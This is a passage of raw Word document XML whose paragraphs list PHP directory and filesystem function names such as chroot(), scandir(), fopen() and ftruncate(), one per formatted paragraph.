          <w:p w14:paraId="6891E238" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>chroot()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FA05A0E" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>closedir()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05ABB184" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>dir()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26C5D40B" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>getcwd()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E648197" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>opendir()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40CC3E4B" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>readdir()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="767EA52D" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>rewinddir()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="739398B2" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>scandir()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0055CD7E" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>basename()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76B912BE" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>chgrp()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3510F72A" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>chmod()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66E6DCF3" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>chown()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41B73630" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>clearstatcache()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CA69619" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>copy()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DD8FB93" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>delete()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5837FC9C" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>dirname()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76E2CE13" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>disk_free_space()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7608B432" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>disk_total_space()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46F5E7C3" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>diskfreespace()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62C8F895" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>fclose()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52F556AD" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>feof()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="290B0FED" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>fflush()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="286ED236" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>fgetc()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E8336A9" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>fgetcsv()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AD4D174" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>fgets()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="617423BC" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>fgetss()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F8BBFE9" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>file()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F4E1499" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>file_exists()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21793250" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>file_get_contents()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="418BDCF0" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>file_put_contents()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DA7ADAB" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>fileatime()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14BE41BB" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>filectime()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61EC56C8" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>filegroup()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42CA2B2B" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>fileinode()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60E6FBC4" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>filemtime()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="185584AB" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>fileowner()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23CF4E44" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>fileperms()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62FA5EBE" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>filesize()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A118946" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>filetype()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DCC0BA2" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>flock()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27E73173" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>fnmatch()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B60DC52" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>fopen()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DF123EE" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>fpassthru()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26FC6244" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>fputcsv()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B528778" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>fputs()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6823EC58" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>fread()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="452EDF6F" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>fscanf()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="323E7BA5" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>fseek()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="221A2603" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>fstat()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6030F5FD" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>ftell()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5159CDE4" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>ftruncate()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D3C7BA4" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
